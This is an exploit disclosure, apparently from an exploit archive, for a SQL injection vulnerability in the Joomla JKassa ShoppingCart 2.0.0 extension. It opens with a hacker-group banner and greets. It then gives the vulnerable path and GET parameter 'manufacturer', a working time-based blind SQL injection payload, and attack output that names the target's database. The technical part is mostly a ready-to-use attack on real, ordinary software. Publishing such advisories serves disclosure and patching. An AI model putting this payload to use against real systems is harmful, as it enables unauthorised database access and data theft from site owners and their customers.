Joomla JKassa ShoppingCart extension version 2.0.0 suffers from a remote SQL injection vulnerability.
1d286657a6509ab45feb55b36b0bc01dd8f56873e7fc43f5845bda2adfc98272
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : GeneticsPro - jkassa.com │
│ Software : Joomla JKassa ShoppingCart 2.0.0 │
│ Vuln Type: SQL Injection │
│ Method : GET │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise │
│ │
│ │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /shop/men/sweatshirts.feed
GET parameter 'manufacturer' is vulnerable
---
Parameter: manufacturer (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 7.4.16
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
current database: 'jkassa_umarket'
[-] Done